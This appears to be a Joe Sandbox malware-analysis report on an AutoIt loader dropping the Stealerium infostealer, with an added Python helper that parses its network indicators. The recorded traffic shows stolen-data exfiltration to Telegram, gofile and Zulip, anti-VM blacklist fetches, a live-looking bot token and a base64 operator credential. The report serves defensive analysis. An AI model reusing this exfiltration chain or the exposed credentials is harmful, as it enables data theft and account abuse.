Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb | source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb | source: Temp.txt.1.dr
Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 | source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb\ | source: Temp.txt.1.dr
Source: Binary string: costura.costura.pdb.compressed | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressedl)=Eo | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: costura.wpf.ui.pdb.compressed | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: !costura.polly.core.pdb.compressed | source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed | source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed | source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb\ | source: Temp.txt.1.dr
Source: Binary string: costura.polly.pdb.compressed | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb | source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 | source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
Source: Binary string: costura.polly.core.pdb.compressed | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr

Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

                          Networking

Source: Network traffic | Suricata IDS: 2834392 - Severity 1 - ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check : 192.168.2.4:49731 -> 188.138.68.212:80
Source: Malware configuration extractor | URLs: https://szurubooru.zulipchat.com/api/v1/messages
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/getMe HTTP/1.1; Host: api.telegram.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /servers HTTP/1.1; Host: api.gofile.io; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /uploadfile HTTP/1.1; Content-Type: multipart/form-data; boundary="b1c2b79f-406c-402d-977e-4b21d28af094"; Host: store6.gofile.io; Content-Length: 121972; Expect: 100-continue; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556397073&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%204%3A57%3A07%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20724536%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20PA_NMRCU%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%8D%93%20%2APorn%20websites%2A%20%28No%20data%29%0A%0A%F0%9F%8C%90%20%2ABrowsers%3A%2A%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%F0%9F%97%83%20%2ASoftware%3A%2A%0A%0A%F0%9F%A7%AD%20%2ADevice%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%F0%9F%A6%A0%20%2AInstallation%3A%2A%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Startup%20disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Clipper%20not%20installed%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Keylogger%20not%20installed%0A%0A%F0%9F%93%84%20%2AFile%20Grabber%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2020%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%2030%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FliMaKC%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%227035101d0d346f9a1fd3ad400ac83b90%22%60%60%60&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1; Host: api.telegram.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/v1/messages HTTP/1.1; Authorization: Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM=; Content-Type: application/x-www-form-urlencoded; Host: szurubooru.zulipchat.com; Content-Length: 1691; Expect: 100-continue; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: icanhazip.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: icanhazip.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: icanhazip.com; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.16.184.241
Source: Joe Sandbox View | IP Address: 45.112.123.126
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: ip-score.com (2 occurrences)
Source: unknown | DNS query: name: icanhazip.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.16.184.241:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 188.138.68.212:80
Source: Network traffic | Suricata IDS: 2029323 - Severity 1 - ET MALWARE Possible Generic RAT over Telegram API : 192.168.2.4:49748 -> 149.154.167.220:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
Source: global traffic | HTTP traffic detected: GET /checkip/ HTTP/1.1; User-Agent: AutoIt; Host: ip-score.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /checkip/ HTTP/1.1; User-Agent: AutoIt; Host: ip-score.com (2 occurrences)
Source: global traffic | HTTP traffic detected: GET /checkip/ HTTP/1.1; User-Agent: AutoIt; Host: ip-score.com (10 occurrences)
Source: global traffic | DNS traffic detected: DNS query: ip-score.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: 56.14.11.0.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: icanhazip.com
Source: global traffic | DNS traffic detected: DNS query: api.gofile.io
Source: global traffic | DNS traffic detected: DNS query: store6.gofile.io
Source: global traffic | DNS traffic detected: DNS query: szurubooru.zulipchat.com
Source: unknown | HTTP traffic detected: POST /uploadfile HTTP/1.1; Content-Type: multipart/form-data; boundary="b1c2b79f-406c-402d-977e-4b21d28af094"; Host: store6.gofile.io; Content-Length: 121972; Expect: 100-continue; Connection: Keep-Alive
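The request lines above record the whole chain in order: the AutoIt loader checks its external IP at ip-score.com with the tell-tale "User-Agent: AutoIt" (the Suricata 2834392 hit), the .NET payload fetches the public virustotal-vm-blacklist lists to decide whether it is being analysed, validates its Telegram bot token with getMe, uploads the password-protected archive to gofile, and then posts the report text (with the gofile link and the archive password) to a Telegram chat and to a Zulip instance. The triage helper below is an added example written for this page, not code from the Joe Sandbox report or from the malware. It assumes the request lines are available as plain strings, uses an abbreviated copy of the sendMessage request from the report as constructed sample input, and the function and constant names (parse_telegram_request, extract_report_fields, decode_basic_auth, classify_request, STAGE_RULES) are the editor's own.

```python
# Added triage helper for the Networking evidence in this report. It is the
# editor's example, not code from the Joe Sandbox report or from the malware:
# it parses the request lines the report records and pulls out reusable IOCs.
import base64
import re
from urllib.parse import parse_qs

# Telegram Bot API calls carry the token in the path ("/bot<id>:<35-char secret>/<method>"),
# so one proxy or sandbox log line is enough to identify and report the bot.
TELEGRAM_PATH_RE = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]{35})/([A-Za-z]+)$")
REPORT_LINE_RE = re.compile(r"^([A-Za-z][A-Za-z ]*): (.+)$", re.MULTILINE)

# Constructed sample input: the sendMessage request from the report with the "text"
# parameter cut down to a few of its lines. The report wraps the real URL onto two
# lines; the memory string https://gofile.io/d/liMaKC confirms the join.
SENDMESSAGE_REQUEST = (
    "GET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage"
    "?chat_id=-4556397073&text="
    "%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0A"
    "Date%3A%202024-11-29%204%3A57%3A07%20am%0A"
    "System%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0A"
    "Username%3A%20user%0ACompName%3A%20724536%0AExternal%20IP%3A%208.46.123.228%0A"
    "%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FliMaKC%29%0A"
    "%F0%9F%94%90%20Archive%20password%20is%3A%20%227035101d0d346f9a1fd3ad400ac83b90%22%60%60%60"
    "&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1"
)
# Authorization header of the Zulip POST, copied from the report.
ZULIP_AUTH_HEADER = "Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM="

# (host regex, path regex, User-Agent regex or None, stage label); first match wins.
# The AutoIt loader and the .NET Stealerium payload use different IP-check services,
# and only the loader sends "User-Agent: AutoIt", which is what the Suricata hit keys on.
STAGE_RULES = [
    (r"^raw\.githubusercontent\.com$", r"^/6nz/virustotal-vm-blacklist/", None, "anti-analysis: fetch VM blacklist"),
    (r"^ip-score\.com$", r"^/checkip/", r"^AutoIt$", "AutoIt loader: external IP check"),
    (r"^icanhazip\.com$", r"^/$", None, "Stealerium: external IP check"),
    (r"^api\.telegram\.org$", r"^/bot\d+:[A-Za-z0-9_-]{35}/getMe$", None, "Stealerium: validate bot token"),
    (r"^api\.telegram\.org$", r"^/bot\d+:[A-Za-z0-9_-]{35}/sendMessage$", None, "Stealerium: send report to Telegram"),
    (r"^(api|store\d+)\.gofile\.io$", r"^/(servers|uploadfile)$", None, "Stealerium: upload archive to gofile"),
    (r"^[\w.-]+\.zulipchat\.com$", r"^/api/v1/messages$", None, "Stealerium: post report to Zulip"),
]


def split_request_line(request_line):
    """Return (verb, path, query) from a logged 'VERB /path?query HTTP/1.1' line."""
    verb, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    return verb, path, query


def parse_telegram_request(request_line):
    """Pull bot id, token, API method, chat_id and decoded text out of a Bot API request."""
    verb, path, query = split_request_line(request_line)
    match = TELEGRAM_PATH_RE.match(path)
    if not match:
        raise ValueError(f"not a Telegram Bot API request: {path}")
    token, api_method = match.groups()
    params = parse_qs(query)  # percent-decodes, so the emoji and newlines come back
    return {
        "verb": verb,
        "bot_id": token.split(":", 1)[0],
        "token": token,
        "api_method": api_method,
        "chat_id": params.get("chat_id", [None])[0],
        "text": params.get("text", [""])[0],
    }


def extract_report_fields(text):
    """Dict of the report's 'Key: value' lines plus the gofile link and archive password."""
    fields = dict(REPORT_LINE_RE.findall(text))
    link = re.search(r"\[Archive download link\]\((https?://[^)\s]+)\)", text)
    password = re.search(r'Archive password is: "([0-9a-f]{32})"', text)
    fields["archive_url"] = link.group(1) if link else None
    fields["archive_password"] = password.group(1) if password else None
    return fields


def decode_basic_auth(header_value):
    """Decode 'Basic <base64(user:password)>'; Stealerium hard-codes the operator's account."""
    scheme, _, blob = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(blob).decode("utf-8").partition(":")
    return user, password


def classify_request(host, request_line, user_agent=None):
    """Label one logged request with the stage of the chain it belongs to, or None."""
    _verb, path, _query = split_request_line(request_line)
    for host_re, path_re, ua_re, label in STAGE_RULES:
        if not re.match(host_re, host) or not re.match(path_re, path):
            continue
        if ua_re and not (user_agent and re.match(ua_re, user_agent)):
            continue
        return label
    return None


if __name__ == "__main__":
    tg = parse_telegram_request(SENDMESSAGE_REQUEST)
    report = extract_report_fields(tg["text"])
    print(f"bot {tg['bot_id']} -> chat {tg['chat_id']} via {tg['api_method']}")
    print(f"victim {report['Username']}@{report['CompName']}, archive {report['archive_url']}")
    print("zulip account:", decode_basic_auth(ZULIP_AUTH_HEADER)[0])
    print(classify_request("ip-score.com", "GET /checkip/ HTTP/1.1", "AutoIt"))
```

Two practical points follow from this. Because the bot token sits in the URL path rather than in a header or body, any TLS-terminating proxy, sandbox or EDR network log that keeps request lines already holds everything needed to hand the bot to Telegram's abuse channel; the same goes for the Zulip Basic credential, which decodes to the operator's account and should be reported to the platform, not reused. The classifier keeps the User-Agent condition on the ip-score.com rule so that the loader's IP check is distinguished from any legitimate client hitting the same service, which is the same distinction the Suricata 2834392 signature draws.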
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.gofile.io
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB381AC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com
Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/
Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/
Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/.com/checkip/
Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/.com/checkip/ificates
Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/1865
Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/3
